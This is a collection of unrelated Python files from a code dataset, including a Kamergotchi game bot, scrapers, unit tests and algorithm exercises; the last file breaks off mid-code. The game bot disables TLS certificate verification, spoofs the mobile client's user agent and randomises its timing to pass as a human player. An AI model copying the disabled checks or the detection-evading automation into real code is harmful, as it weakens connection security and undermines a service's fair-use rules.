+{"seq_id":"645715748","text":"# Kamergotchi Assistant\n# https://github.com/aolieman/kamergotchi-assistant\n#\n# FORK OF:\n# Kamergotchi Automator\n# https://github.com/MartienB/kamergotchi-automator\n# Developed by: Martien Bonfrer\n# Date: 20/2/17\n\nimport codecs\nimport random\nimport datetime\nimport logging\nimport ssl\nimport sys\nimport time\nimport json\nfrom urllib.error import HTTPError, URLError\nfrom urllib.parse import urlencode, urljoin\nfrom urllib.request import Request, urlopen\nfrom numpy.random import lognormal\nfrom pprint import pformat\nfrom functools import wraps\nfrom operator import itemgetter\n\nfrom secret import PLAYER_ID, SLEEP_INTERVAL, CLAIM_ONLY\n\n\nlogger = logging.getLogger('kamergotchi.player')\nlogger.handlers = []\nlhand = logging.StreamHandler()\nformatter = logging.Formatter(\n '%(asctime)s -- %(message)s',\n \"%Y-%m-%d %H:%M:%S\"\n)\nlhand.setFormatter(formatter)\nlogger.addHandler(lhand)\nlogger.setLevel(logging.INFO)\n\nplayer_token = PLAYER_ID\nbedtime, waketime = SLEEP_INTERVAL\n\nbase_headers = {\n 'User-Agent': \"okhttp/3.4.1\",\n 'Host': \"api.kamergotchi.nl\",\n 'accept': \"application/json, text/plain, */*\",\n 'Connection': \"close\"\n}\n\nlast_action_time = datetime.datetime.utcnow()\n\n\ndef timed_action(func):\n \"\"\"\n Keep track of when the last action was taken\n \"\"\"\n @wraps(func)\n def wrapped_action(*args, **kwargs):\n global last_action_time\n last_action_time = datetime.datetime.utcnow()\n return func(*args, **kwargs)\n \n return wrapped_action\n \n\n\ndef getInfo(player_token, retries=0):\n url = 'https://api.kamergotchi.nl/game'\n headers = base_headers.copy()\n headers['x-player-token'] = player_token\n \n request = Request(url, headers=headers)\n\n # There is something wrong with the ssl certificate, so we just ignore it!\n context = ssl._create_unverified_context()\n try:\n json_resp = urlopen(request, context=context).read().decode()\n except (HTTPError, URLError) as e:\n logger.error('Info Error: {}'.format(e))\n time.sleep(1 + 2 * retries)\n return getInfo(player_token, 1 + retries)\n\n resp_dict = json.loads(json_resp)\n game = resp_dict['game']\n if game.get('quotes'):\n progress(pformat(game['quotes']))\n \n full_health = min(game['current'].values()) == 100\n if not full_health:\n progress(str(game['current']))\n \n game['care_reset_date'] = datetime.datetime.strptime(\n game['careReset'], \n \"%Y-%m-%dT%H:%M:%S.%fZ\"\n )\n game['claim_reset_date'] = datetime.datetime.strptime(\n game['claimReset'], \n \"%Y-%m-%dT%H:%M:%S.%fZ\"\n )\n return game\n\n \ndef giveMostNeededCare(player_token):\n game = getInfo(player_token)\n \n care_left = game['careLeft']\n current = game['current']\n full_health = min(current.values()) == 100\n\n care_reset_date = game['care_reset_date']\n claim_reset_date = game['claim_reset_date']\n utcnow = datetime.datetime.utcnow()\n\n # claim bonus, or give care, or wait for a while\n wait_seconds = 0\n if (CLAIM_ONLY or full_health) and (utcnow > claim_reset_date):\n claimBonus(player_token)\n logger.info(pformat(game))\n elif not (CLAIM_ONLY or full_health) and (care_left > 0 or utcnow > care_reset_date):\n lowest_stat = min(current.items(), key=itemgetter(1))[0]\n giveCare(player_token, lowest_stat)\n elif CLAIM_ONLY or full_health:\n # wait until next action\n wait_seconds = 1\n else:\n # we hit the care limit; try again in about 6 minutes\n wait_seconds = (care_reset_date - utcnow).total_seconds()\n progress('Not yet! Remaining seconds: {}'.format(wait_seconds))\n \n return wait_seconds, claim_reset_date\n \n\n@timed_action\ndef claimBonus(player_token):\n context = ssl._create_unverified_context() \n sessionUrl = 'https://api.kamergotchi.nl/game/claim'\n\n headers = base_headers.copy()\n headers['x-player-token'] = player_token\n\n req = Request(sessionUrl, headers=headers, method='POST')\n\n try: \n response = urlopen(req, context=context)\n json_resp = response.read().decode()\n resp_dict = json.loads(json_resp)\n game = resp_dict['game']\n if game.get('quotes'):\n progress(pformat(game['quotes']))\n \n progress('Succesfully claimed bonus!')\n except (HTTPError, URLError) as e:\n logger.error('Claim Error: {}'.format(e))\n except:\n logger.exception('Unexpected Claim Error:')\n\n\n@timed_action\ndef giveCare(player_token, careType): \n context = ssl._create_unverified_context() \n sessionUrl = 'https://api.kamergotchi.nl/game/care'\n reqBody = {'bar' : careType}\n\n data = json.dumps(reqBody, separators=(',', ':')).encode('utf-8')\n\n headers = base_headers.copy()\n headers['x-player-token'] = player_token\n headers['Content-type'] = \"application/json;charset=utf-8\"\n\n req = Request(sessionUrl, data, headers, method='POST')\n\n try: \n response = urlopen(req, context=context)\n json_resp = response.read().decode()\n resp_dict = json.loads(json_resp)\n game = resp_dict['game']\n if game.get('quotes'):\n progress(pformat(game['quotes']))\n\n progress('{} -- Succesfully cared: {}'.format(game['score'], careType))\n except (HTTPError, URLError) as e:\n logger.error('Care Error: {}'.format(e))\n except:\n logger.exception('Unexpected Care Error:')\n\n \ndef progress(msg):\n logger.info(msg)\n \n \ndef utc_to_local(utc_dt):\n return utc_dt.replace(tzinfo=datetime.timezone.utc).astimezone(tz=None)\n \n \ndef sleep_until(wakeup_dt, perturbation):\n utcnow = datetime.datetime.utcnow()\n delta_till = wakeup_dt - utcnow\n if random.random() < 0.67:\n delta_till += datetime.timedelta(seconds=perturbation)\n else:\n delta_till -= datetime.timedelta(seconds=perturbation)\n \n snooze = abs(delta_till.seconds)\n progress('Be back at {:%Y-%m-%d %H:%M:%S}\\n'.format(utc_to_local(utcnow + delta_till)))\n time.sleep(snooze)\n \n \ndef ceil_dt(dt, delta):\n return dt + (datetime.datetime.min - dt) % delta\n \n \ndef get_next_dt(claim_reset_date=None):\n utcnow = datetime.datetime.utcnow()\n next_half_hour = ceil_dt(utcnow, datetime.timedelta(minutes=30))\n \n # stop making requests before the game is over\n if next_half_hour >= datetime.datetime(2017, 3, 11, 23, 00):\n progress('Plenty of cares were given. Take care!')\n sys.exit()\n \n # turn a whole hour into the next half hour\n if next_half_hour.minute == 0:\n next_half_hour += datetime.timedelta(minutes=30)\n \n # upcoming claim before next half hour\n if claim_reset_date and utcnow < claim_reset_date < next_half_hour:\n return claim_reset_date\n \n return next_half_hour\n \n\nif __name__ == '__main__':\n # one time next_dt init to 6 minutes ago\n next_dt = datetime.datetime.utcnow() - datetime.timedelta(minutes=6)\n\n while True:\n long_intervals = (lognormal(0, 2, size=10) + 1) * 2\n\n for liv in long_intervals:\n short_intervals = lognormal(0, 1, size=30) / 2\n \n game = getInfo(player_token)\n claim_reset = game['claim_reset_date']\n time.sleep(1 + short_intervals[-1])\n \n utcnow = datetime.datetime.utcnow()\n if bedtime <= utc_to_local(utcnow) < waketime:\n progress(\n 'ZzZzZzZ -- {:%Y-%m-%d %H:%M} <= {:%Y-%m-%d %H:%M} < {:%Y-%m-%d %H:%M}'.format(\n bedtime, utc_to_local(utcnow), waketime\n )\n )\n next_dt = get_next_dt(claim_reset)\n seconds_until_claim = (claim_reset - utcnow).total_seconds()\n max_wait_seconds = 5 * 60\n \n if utcnow > claim_reset or seconds_until_claim <= max_wait_seconds: \n progress('Claim due {:%Y-%m-%d %H:%M:%S}'.format(utc_to_local(claim_reset)))\n else:\n sleep_until(next_dt, random.random() * 4)\n \n wait = 0\n for siv in short_intervals:\n try:\n wait, claim_reset = giveMostNeededCare(player_token)\n if wait:\n break\n except:\n logger.exception('Unexpected issue:')\n progress('Retrying in {} seconds'.format(wait + siv))\n \n time.sleep(wait + siv)\n \n utcnow = datetime.datetime.utcnow()\n \n # keep trying until an action is taken or 9 minutes have passed\n if wait is 1 and (\n (last_action_time > next_dt)\n or (utcnow > next_dt + datetime.timedelta(minutes=9))\n ):\n next_dt = get_next_dt(claim_reset)\n sleep_until(next_dt, liv)\n else:\n snooze = wait + min(liv, 367.67)\n progress('Be back in {} seconds'.format(snooze))\n time.sleep(snooze)\n \n\n","sub_path":"kg-assistant.py","file_name":"kg-assistant.py","file_ext":"py","file_size_in_byte":9153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"33209586","text":"import urllib.request\nimport lxml.html\nfrom lxml.cssselect import CSSSelector\nimport re\n\ndef download(url, user_agent=\"wswp, num_retries=2\"):\n print('Downloading:', url)\n #headers = {'User-agent': user_agent}\n #request = urllib.request(url, headers=headers)\n html = urllib.request.urlopen(url).read().decode('utf-8')\n# except urllib.URLError as e:\n# print('Download error:', e.reason)\n# html = None\n# if num_retries > 0:\n# if hasattr(e, 'code') and 500 <= e.code < 600:\n# return download(url, user_agent, num_retries-1)\n return html\n\ndef crawl_sitemap(url):\n sitemap = download(url)\n links = re.findall('(.*?)', sitemap)\n for link in links:\n html = download(link)\n if scrape_callback:\n links.extend(scrape_callback(url, html) or [])\ndef scrape_callback(url, html):\n #autor = re.findall('(*.?)', html)\n tree = lxml.html.fromstring(html)\n #fixed_html = lxml.html.tostring(tree, pretty_print=True)\n h4span = tree.cssselect('span.author-content h4')[0]\n posttitle = tree.cssselect('h1.post-title')[0]\n #postheader = tree.cssselect('h1.post-title')[0]\n postcontent = tree.cssselect('section.post-content')[0]\n autor = h4span.text_content()\n print(autor)\n print(posttitle.text_content())\n print(postcontent.text_content())\n #row = [tree.cssselect('table > tr#places_%s__row > td.w2p_fw' % field)[0].text_content() for field in FIELDS]\n #print(tree.findall(''))\n\ncrawl_sitemap('https://teonite.com/blog/sitemap-posts.xml')\n","sub_path":"scrapping2.py","file_name":"scrapping2.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"523327135","text":"from unittest import TestCase\nfrom unittest.mock import patch\n\nfrom inventory_management.electric_appliances_class import ElectricAppliances\nfrom inventory_management.furniture_class import Furniture\nfrom inventory_management.inventory_class import Inventory\nimport inventory_management.main as main\nfrom inventory_management.market_prices import get_latest_price\n\n\nclass MainTests(TestCase):\n\n def test_main_menu(self):\n with patch ('builtins.input', side_effect ='1'):\n self.assertEqual(main.main_menu(), main.add_new_item)\n with patch ('builtins.input', side_effect ='2'):\n self.assertEqual(main.main_menu(), main.item_info)\n with patch ('builtins.input', side_effect ='q'):\n self.assertEqual(main.main_menu(), main.exit_program)\n\n\n def test_get_price(self):\n self.assertEqual(24, main.get_price())\n\n\n def test_add_new_item(self):\n electric_appliance = [1, \"item\", 5, \"n\", \"y\", \"brand\", 5.5]\n furniture = [1, \"item\", 5, \"y\", \"material\", \"XL\"]\n inventory = [1, \"item\", 5, \"n\", \"n\"]\n\n with patch('builtins.input', side_effect=electric_appliance):\n main.FULL_INVENTORY = {}\n main.add_new_item()\n test_dict = {1: {'product_code': 1, 'description': \"item\", 'market_price': 24,\n 'rental_price': 5, 'brand': \"brand\", 'voltage': 5.5}}\n self.assertEqual(main.FULL_INVENTORY, test_dict)\n\n with patch('builtins.input', side_effect=furniture):\n main.FULL_INVENTORY = {}\n main.add_new_item()\n test_dict = {1: {'product_code': 1, 'description': \"item\", 'market_price': 24,\n 'rental_price': 5, 'material': \"material\", 'size': \"XL\"}}\n self.assertEqual(main.FULL_INVENTORY, test_dict)\n\n with patch('builtins.input', side_effect=inventory):\n main.FULL_INVENTORY = {}\n main.add_new_item()\n test_dict = {1: {'product_code': 1, 'description': \"item\", 'market_price': 24,\n 'rental_price': 5}}\n self.assertEqual(main.FULL_INVENTORY, test_dict)\n\n\n def test_item_info(self):\n expected = \"Item not found in inventory\"\n with patch('builtins.input', side_effect = '1'):\n main.FULL_INVENTORY = {}\n self.assertEqual(print(expected), main.item_info())\n\n test_dict = {'product_code': 1, 'description': \"item\", 'market_price': 5,\n 'rental_price': 5, 'brand': \"brand\", 'voltage': 5.5}\n expected = \"product_code: 1\\ndescription: item\\nmarket_price: 5\\nrental_price: 5\\nbrand: brand\\nvoltage: 5.5\\n\"\n with patch('builtins.input', side_effect = '1'):\n main.FULL_INVENTORY['1'] = test_dict\n self.assertEqual(print(expected), main.item_info())\n\n\n def test_exit_program(self):\n with self.assertRaises(SystemExit):\n main.exit_program()\n\n\nclass ElectricAppliancesTests(TestCase):\n\n def test_return_as_dict(self):\n electric_appliance = ElectricAppliances(1, \"item\", 5, 5, \"brand\", 5.5)\n test_dict = {'product_code': 1, 'description': \"item\", 'market_price': 5,\n 'rental_price': 5, 'brand': \"brand\", 'voltage': 5.5}\n\n self.assertEqual(test_dict, electric_appliance.return_as_dictionary())\n\n\nclass FurnitureTests(TestCase):\n\n def test_return_as_dict(self):\n furniture = Furniture(1, \"item\", 5, 5, \"material\", \"XL\")\n test_dict = {'product_code': 1, 'description': \"item\", 'market_price': 5,\n 'rental_price': 5, 'material': \"material\", 'size': \"XL\"}\n\n self.assertEqual(test_dict, furniture.return_as_dictionary())\n\n\nclass InventoryTests(TestCase):\n\n def test_return_as_dict(self):\n inventory = Inventory(1, \"item\", 5, 5)\n test_dict = {'product_code': 1, 'description': \"item\", 'market_price': 5, 'rental_price': 5}\n\n self.assertEqual(test_dict, inventory.return_as_dictionary())\n\n\nclass MarketPriceTests(TestCase):\n\n def test_get_latest_price(self):\n self.assertEqual(24, get_latest_price())\n\n\n","sub_path":"students/bplanica/lesson01/assignment/test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"375698486","text":"import heapq\r\n\r\ndef getName():\r\n\treturn \"Kainth, Mayank\"\r\n\r\n# This node structure might be useful to you\r\nclass Node:\r\n def __init__(self,value,data,left=None,right=None):\r\n self.value = value\r\n self.data = data\r\n self.left = left\r\n self.right = right\r\n\r\n def __lt__(self, other):\r\n if self.value < other.value:\r\n return True\r\n return False\r\n\r\n def __le__(self, other):\r\n if self.value <= other.value:\r\n return True\r\n return False\r\n\r\n def __gt__(self, other):\r\n if self.value > other.value:\r\n return True\r\n return False\r\n\r\n def __ge__(self, other):\r\n if self.value >= other.value:\r\n return True\r\n return False\r\n\r\nclass MyHuffman():\r\n\r\n\r\n def build(self, weights):\r\n # Build a huffman tree from the dictionary of character:value pairs\r\n #print(\"Building huffman tree with dictionary {}\".format(weights))\r\n\r\n self.heap = [] # create and empty heap\r\n def printHeap():\r\n for i in self.heap:\r\n print(\"{}/{}\".format(i.value, i.data))\r\n\r\n for i in weights: # poulate heap with leaf nodes\r\n self.heap.append(Node(weights[i], i))\r\n #print(f\"added node {weights[i]}/{i}\")\r\n\r\n heapq.heapify(self.heap)\r\n\r\n\r\n\r\n #printHeap()\r\n\r\n while True:\r\n a = heapq.heappop(self.heap)\r\n b = heapq.heappop(self.heap) if len(self.heap) > 0 else None\r\n sum = a.value + b.value if b is not None else a.value\r\n heapq.heappush(self.heap, Node(sum, None, a, b))\r\n # print(f\"The Node with L:{a.value} and R:{b.value} has been created with value{sum}\")\r\n\r\n if len(self.heap) == 1:\r\n break\r\n\r\n print(\"Finished building Huffman Tree for passed word\")\r\n\r\n def encode(self, word):\r\n # Return the bitstring of word encoded by the rules of your huffman tree\r\n #print(f\"The word that was passed is {word}\")\r\n\r\n self.word = word\r\n dict = {}\r\n for i in word: dict[i] = word.count(i)\r\n #print(f\"Dictionary: {dict}\")\r\n\r\n self.build(dict) #build a huffman tree\r\n self.reference = {} #create a dictionary of references to speed up encoding the word\r\n encodedWord, self.code = \"\", \"\"\r\n\r\n def fillReference(node):\r\n if node.data is not None:\r\n self.reference[node.data] = self.code\r\n\r\n if node.left is not None:\r\n self.code += \"1\"\r\n fillReference(node.left)\r\n self.code = self.code[:-1]\r\n\r\n if node.right is not None:\r\n self.code+=\"0\"\r\n fillReference(node.right)\r\n self.code = self.code[:-1]\r\n\r\n fillReference(self.heap[0])\r\n\r\n for i in word:\r\n encodedWord += self.reference.get(i)\r\n\r\n #print(f\"the bitcode is: {encodedWord}\r\n print(self.reference)\r\n return encodedWord\r\n\r\n\r\n\r\n def decode(self, bitstring):\r\n # Return the word encoded in bitstring, or None if the code is invalid\r\n word = \"\"\r\n\r\n #print(f\"decoding {bitstring} using tree from word {self.word}\")\r\n pos = self.heap[0]\r\n\r\n\r\n for i in range(len(bitstring)): #this loop decodes the word by searching through the node\r\n if bitstring[i] == \"0\" and pos.right is not None:\r\n pos = pos.right\r\n elif bitstring[i] == \"1\" and pos.left is not None:\r\n pos = pos.left\r\n else:\r\n return None\r\n\r\n if pos.data is not None:\r\n word += pos.data\r\n pos = self.heap[0]\r\n\r\n print(f\"The decoded word is '{word}'\")\r\n return word\r\n\r\n\r\n\r\n\r\n\r\na = MyHuffman()\r\n","sub_path":"Lab 3/Lab3-Template2.py","file_name":"Lab3-Template2.py","file_ext":"py","file_size_in_byte":3814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"539901730","text":"#https://leetcode.com/problems/two-sum/\n\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n dic={}\n for i in range(len(nums)):\n dic[nums[i]]=i\n for i in range(len(nums)):\n s=target-nums[i]\n ind=dic.get(s,-1)\n if ind!=-1 and i!=ind:\n return([i,ind])\n break\n \n ","sub_path":"solutions/1_two_sum.py","file_name":"1_two_sum.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"146781174","text":"from algorithm.calculate import path_nodes\nfrom algorithm.calculate import path_distance_time\nfrom algorithm.calculate import count_charge_cnt\nfrom algorithm.calculate import path_time_info\n\nclass TransportPath(object):\n\n def __init__(self, path, vehicle_id):\n self.id = id\n self.path = path\n self.vehicle_id = vehicle_id\n self.weight = 0\n self.volume = 0\n self.waiting_tm = 0\n self.distance = 0\n self.trans_cost = 0\n self.start_tm = 0\n self.back_tm = 0\n self.charge_cost = 0\n self.wait_cost = 0\n self.fixed_use_cost = 0\n self.total_cost = 0\n self.charge_cnt = 0\n def calc_path_info(self,individual_id, distance_matrix, time_matrix, vehicle_info, id_sorted_orders, id_type_map):\n # (tp, individual_id, distance_matrix, time_matrix, vehicle_info, id_sorted_orders, id_type_map):\n self.weight = path_nodes(self.path, id_sorted_orders)[0]\n self.volume = path_nodes(self.path, id_sorted_orders)[1]\n self.distance = path_distance_time(self.path, distance_matrix, time_matrix)[0]\n\n t_str = str(1000 + individual_id)\n self.id = \"DP0\" + t_str[1:]\n t_tm = path_time_info(id_sorted_orders, self.path, distance_matrix, time_matrix, vehicle_info[self.vehicle_id - 1],\n id_type_map)\n self.start_tm = t_tm[0]\n self.back_tm = t_tm[1]\n\n self.waiting_tm = t_tm[2]\n self.charge_cnt = count_charge_cnt(self.path)\n\n if self.vehicle_id == 2:\n self.trans_cost = self.distance * 0.014\n else:\n self.trans_cost = self.distance * 0.012\n self.wait_cost = self.waiting_tm / 60 * 24\n self.charge_cost = self.charge_cnt * 50\n if self.vehicle_id == 2:\n self.fixed_use_cost = 300\n else:\n self.fixed_use_cost = 200\n # 总成本=运输成本+等待成本+充电成本+固定成本\n self.total_cost = self.trans_cost + self.wait_cost + self.charge_cost + self.fixed_use_cost\n return self\n\n def to_list(self):\n \"\"\"需要你自定义函数行为\"\"\"\n return [self.id, self.vehicle_id, self.path, self.start_tm,self.back_tm,self.distance,\n self.trans_cost, self.charge_cost, self.wait_cost,self.fixed_use_cost,self.total_cost,\n self.charge_cnt, self.weight, self.volume]","sub_path":"entity/TransportPath.py","file_name":"TransportPath.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"185152869","text":"import numpy as np\nimport scipy.io as sio\nimport pyphi\nimport time\nfrom ising import gen_reservoir\nimport matplotlib.pyplot as plt\n\nnetwork = input('Network: ')\nmethod = input('Method: ')\n\n# filename = '/Ising_random_' + network #'Ising_Phi_DMN' \nfilename = '/Ising_' + method + '_1' #'Ising_met_1' \ndirectory = 'Parallel Code Stuff/Simulations/Ising_Networks/'\nwd = 'Current_Sims/' + network + '/'\n\nmat = sio.loadmat(directory + wd + method + filename + '.mat')\n\nT = mat['temp']\nJ = mat['J']\nJ = J!=0\nspinBin = mat['spinBin']\n#S = mat['EXPORT'] # spin time-series through temperature\nM = np.array(gen_reservoir(J.shape[1]),dtype='uint8')\n\nTPM = mat['TPM']\n\ntemplen = T.shape[1]\nprint('The number of data points to calculate Phi for is ' + str(templen))\n\ntempstart = input('Start from data point: ')\ntempstart = int(tempstart)\n\ntempend = input('End at data point: ')\ntempend = int(tempend)\n\nincrement = input('Increment every _ data points: ')\nincrement = int(increment)\n\nsuffix = input('Filename suffix: ')\n\nnumStates = M.shape[0]\n\nind = np.arange(tempstart,tempend,increment) # indices of data points that phi will be calculated for\nT2 = T[0,ind]\n\nlooplen = ind.shape[0] # number of iterations of loop\n\n# phi = np.zeros([numStates,templen])\nphi = np.zeros([numStates,looplen])\nphiSqr = np.zeros([numStates,looplen])\ncount = 0\n\nprint('Calculating...')\nfor temp in range(tempstart,tempend,increment):\n print( ((temp)/(tempend - tempstart))*100,\"% Complete\")\n for state in range(numStates): #numflips\n if spinBin[state,temp] != 0:\n start = time.time()\n #print(\"Starting state \", M[state,:], \"at temp. \", T[0,temp])\n network = pyphi.Network(TPM[:,:,temp], connectivity_matrix=J)\n #subsystem = pyphi.Subsystem(network, S[:,state,temp], range(network.size))\n subsystem = pyphi.Subsystem(network, M[state,:], range(network.size))\n #print(subsystem)\n phi[state,count] = pyphi.compute.big_phi(subsystem)\n phiSqr[state,count] = phi[state,count]*phi[state,count]\n print(\"Phi = \", phi[state,count])\n #input()\n end = time.time()\n #print(end - start, \"seconds elapsed\")\n count += 1\n\n\nphiSum = np.sum(phi*spinBin[:,ind],0)\nphiSqrSum = np.sum(phiSqr*spinBin[:,ind],0)\n\nphiSus = (phiSqrSum - phiSum*phiSum)/(T2*J.shape[0])\n#print('Done!')\n\nnp.savez(directory + 'pyPhi/' + filename + '_' + suffix ,phiSum = phiSum,phiSus = phiSus,T2 = T2)\n\nplt.plot(T2,phiSum,\"o\")\nplt.plot(T2,phiSum,\"o\")\nplt.show()\n","sub_path":"meanPhi_testing_stuff.py","file_name":"meanPhi_testing_stuff.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"462745299","text":"#!/usr/bin/env python\nfrom pylab import *\nfrom scipy.io import mmread\n\nA = mmread('Serena.mtx')\n\nfig, (ax1, ax2) = subplots(2, 1, sharex=True, figsize=(8,10), gridspec_kw=dict(height_ratios=[4,1]))\nax1.spy(A, marker='.', markersize=0.25, alpha=0.2)\naxins = ax1.inset_axes([0.55, 0.55, 0.4, 0.4])\naxins.spy(A, marker='o', markersize=3, alpha=0.5)\nn = (A.shape[0] // 3 // 3) * 3\naxins.set_xlim([n - 0.5, n + 44.5])\naxins.set_ylim([n - 0.5, n + 44.5])\naxins.invert_yaxis()\naxins.set_xticklabels('')\naxins.set_yticklabels('')\nax1.indicate_inset_zoom(axins)\n\nax2.semilogy(A.diagonal())\nax2.set_ylabel('Diagonal')\n\ntight_layout()\nsavefig('Serena.png')\n","sub_path":"tutorial/2.Serena/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"619803720","text":"\nfrom typing import List\n\n\"\"\" core of this problem is to find the largest difference between two elements (may be the same element) \nin an unsorted array. \nO(n^2) if I scan from left to right and put 'buy' pointer on each index.\nO(n) if I scan beforehand to compute maximum sell price in prices[i:] and \nsecond pass to determine maximum difference. \n\nO(n) one pass: keep track of highest peak after lowest trough\nkeep track of minimum_price so far and maximum profit so far. \n\"\"\"\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n if not prices:\n return 0\n minimum_price = prices[0]\n maximum_profit = 0\n for i in prices:\n minimum_price = min(i,minimum_price)\n tprofit = i - minimum_price\n maximum_profit = max(tprofit, maximum_profit)\n return maximum_profit\n \n\n # best_sell = [prices[-1] for i in range(len(prices))]\n # # dp \n # for i in range(len(best_sell) - 2, -1, -1):\n # best_sell[i] = max(prices[i],best_sell[i+1])\n # diff = 0\n # for ind,val in enumerate(prices):\n # temp = best_sell[ind] - val\n # if temp > diff:\n # diff = temp\n # return diff\n\na = [7,1,5,3,6,4]\nprint(Solution().maxProfit(a))","sub_path":"121. Best Time to Buy and Sell Stock.py","file_name":"121. Best Time to Buy and Sell Stock.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"631190018","text":"import unittest\r\n\r\nfrom pteromyini.interpreter.xpath import XPath\r\n\r\n\r\nclass TestXpath(unittest.TestCase):\r\n\r\n def test_execute(self):\r\n xpath = XPath([\"@c\", '\"over text\"'])\r\n xpath = XPath([\"a\", \"@b\", '~\"some text\"', xpath])\r\n print(xpath)\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","sub_path":"custom_library/pteromyini/pteromyini/interpreter/test/test_xpath.py","file_name":"test_xpath.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"34076450","text":"import csv\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport nltk\nnltk.download(\"vader_lexicon\")\n\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\n\nDOWNLOAD_URL = 'https://www.imdb.com/title/tt0468569/reviews?ref_=tt_urv'\n\n\ndef download_page(url):\n\n return urllib.request.urlopen(url)\n\n# print(download_page(DOWNLOAD_URL).read())\n\n\ndef parse_html(html):\n \"\"\"\n Read the data from IMDB and append write a csv. Also add a \"sentiment\" column that shows the overall sentiment of each review \n \"\"\"\n soup = BeautifulSoup(html, features=\"lxml\")\n movie_table = soup.find('div', attrs={'class': 'lister-list'})\n review_list = []\n for divs in movie_table.find_all('div', attrs={\"class\": \"lister-item mode-detail imdb-user-review collapsable\"}):\n movie_rating = divs.find('div', attrs={'class': 'ipl-ratings-bar'})\n rating_container = movie_rating.find(\"span\", attrs={'class': 'rating-other-user-rating'})\n rating_ratings = rating_container.find(\"span\").text\n movie_review = divs.find('div', attrs={'class': 'content'})\n review_reviews = movie_review.find(\"div\", attrs = {\"class\": \"text show-more__control\"}).text\n\n review_sentiment = SentimentIntensityAnalyzer().polarity_scores(review_reviews)\n if float(review_sentiment[\"compound\"])>=0.05:\n sentiment = \"Positive\"\n elif float(j[\"compound\"])<=-0.05:\n sentiment = \"Negative\"\n else:\n sentiment = \"Neutral\"\n\n review_list.append((review_reviews,rating_ratings, sentiment))\n return review_list\n\n\n\ndef main():\n url = DOWNLOAD_URL\n\n with open('dark_knight_movie_review.csv', 'w', encoding='utf-8', newline='') as f:\n writer = csv.writer(f)\n\n fields = ('reviews', 'ratings', 'sentiment')\n writer.writerow(fields)\n\n html = download_page(url)\n movies = parse_html(html)\n writer.writerows(movies)\n\n\nif __name__ == '__main__':\n main()","sub_path":"imdb-scraping-dark-knight.py","file_name":"imdb-scraping-dark-knight.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"219479275","text":"from bs4 import BeautifulSoup\nimport urllib.request\nimport re\nimport pandas as pd\nimport time\n\n# write HTML to a file in case no Internet available\n# with open(\"meta_page.html\", \"w\", encoding=\"utf-8\") as f:\n# f.write(soup.prettify())\n\nurl = (\n \"http://congbothongtin.ssc.gov.vn/idsPortal/ttcb/bctc/index.ubck?idBcBaoCao=&ttBc=&\"\n)\n# cpage=2: add this params to the url to navigate to needed pages\n\n\ndef get_last_page(url):\n page = urllib.request.urlopen(url)\n soup = BeautifulSoup(page, \"html.parser\")\n filter_div_tag = soup.find_all(\"div\", class_=\"pager\")\n filter_span_tag = filter_div_tag[0].find_all(\"span\", class_=\"pages\")\n last_page = filter_span_tag[0].text.split(\"/\")[-1].strip()\n return last_page\n\n\ndef parse_element_to_table(input, value):\n arr = []\n arr.append(input[value].text.strip())\n return arr\n\n\ndef get_report_id(input, start_point, step):\n report_number = []\n period_number = []\n for i in range(start_point, len(input), step):\n func_name = input[i].a[\"href\"]\n func_value = re.findall(r\"\\(.*?\\)\", func_name)\n splitting = func_value[0].split()\n report_number.append(splitting[0][1:-1])\n period_number.append(splitting[1][0:-1])\n return report_number, period_number\n\n\ndef open_page(url):\n code = True\n i = 0\n while code:\n try:\n page = urllib.request.urlopen(url)\n code = False\n except HTTPError as e:\n i += 1\n print(f\"Lan thu: {i}\")\n time.sleep(60)\n if i == 10:\n break\n return page\n\n\ndef crawler(url):\n last_page = get_last_page(url)\n complete_df = []\n # for i in range(int(last_page)):\n for i in range(500):\n page = open_page(url + \"cpage=\" + str(i))\n soup = BeautifulSoup(page, \"html.parser\")\n\n # There are 2 approaches:\n # This paragrahp is the first one which use `tr` tag\n # name = soup.find_all('tr', class_='')\n # t = []\n # for i in name:\n # h = i.find_all('td')\n # t.append(h)\n # print(name[8].contents[3].text)\n # print(name[8].contents[5].a['href'])\n\n # Second approach: use `table` tag\n table = soup.find_all(\"table\", class_=\"product-table\")\n data = table[0].find_all(\"td\")\n # id: need to remove \\n \\t\n # company name: no need to do\n # report name: need to remove \\n \\t\n # report_id & period_id: different extraction method\n # quarter name: remove \\n \\t\n # trich yeu: remove \\n \\t\n # time sent: remove \\n \\t\n id = parse_element_to_table(data, 0, 7)\n company_name = parse_element_to_table(data, 1, 7)\n report_name = parse_element_to_table(data, 2, 7)\n quarter_name = parse_element_to_table(data, 3, 7)\n trich_yeu = parse_element_to_table(data, 4, 7)\n time_sent = parse_element_to_table(data, 5, 7)\n report_number, period_number = get_report_id(data, 2, 7)\n dict = {\n \"id\": id,\n \"company_name\": company_name,\n \"report_name\": report_name,\n \"report_number\": 